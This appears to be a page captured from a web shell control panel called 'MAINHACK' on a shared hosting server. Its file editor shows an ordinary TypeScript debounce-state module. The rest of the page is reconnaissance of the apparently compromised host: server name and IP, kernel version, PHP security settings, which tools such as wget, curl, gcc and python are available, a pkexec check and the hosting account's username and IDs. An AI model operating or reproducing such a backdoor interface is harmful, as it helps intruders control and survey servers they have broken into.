[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: debounceState.ts
import type * as Chunk from "../../Chunk.js" import type * as Fiber from "../../Fiber.js" import type * as HandoffSignal from "./handoffSignal.js" /** @internal */ export type DebounceState<A, E = never> = NotStarted | Previous<A> | Current<A, E> /** @internal */ export const OP_NOT_STARTED = "NotStarted" as const /** @internal */ export type OP_NOT_STARTED = typeof OP_NOT_STARTED /** @internal */ export const OP_PREVIOUS = "Previous" as const /** @internal */ export type OP_PREVIOUS = typeof OP_PREVIOUS /** @internal */ export const OP_CURRENT = "Current" as const /** @internal */ export type OP_CURRENT = typeof OP_CURRENT export interface NotStarted { readonly _tag: OP_NOT_STARTED } /** @internal */ export interface Previous<out A> { readonly _tag: OP_PREVIOUS readonly fiber: Fiber.Fiber<Chunk.Chunk<A>> } /** @internal */ export interface Current<out A, out E = never> { readonly _tag: OP_CURRENT readonly fiber: Fiber.Fiber<HandoffSignal.HandoffSignal<A, E>, E> } /** @internal */ export const notStarted: DebounceState<never> = { _tag: OP_NOT_STARTED } /** @internal */ export const previous = <A>(fiber: Fiber.Fiber<Chunk.Chunk<A>>): DebounceState<A> => ({ _tag: OP_PREVIOUS, fiber }) /** @internal */ export const current = <A, E>(fiber: Fiber.Fiber<HandoffSignal.HandoffSignal<A, E>, E>): DebounceState<A, E> => ({ _tag: OP_CURRENT, fiber })
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.82 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344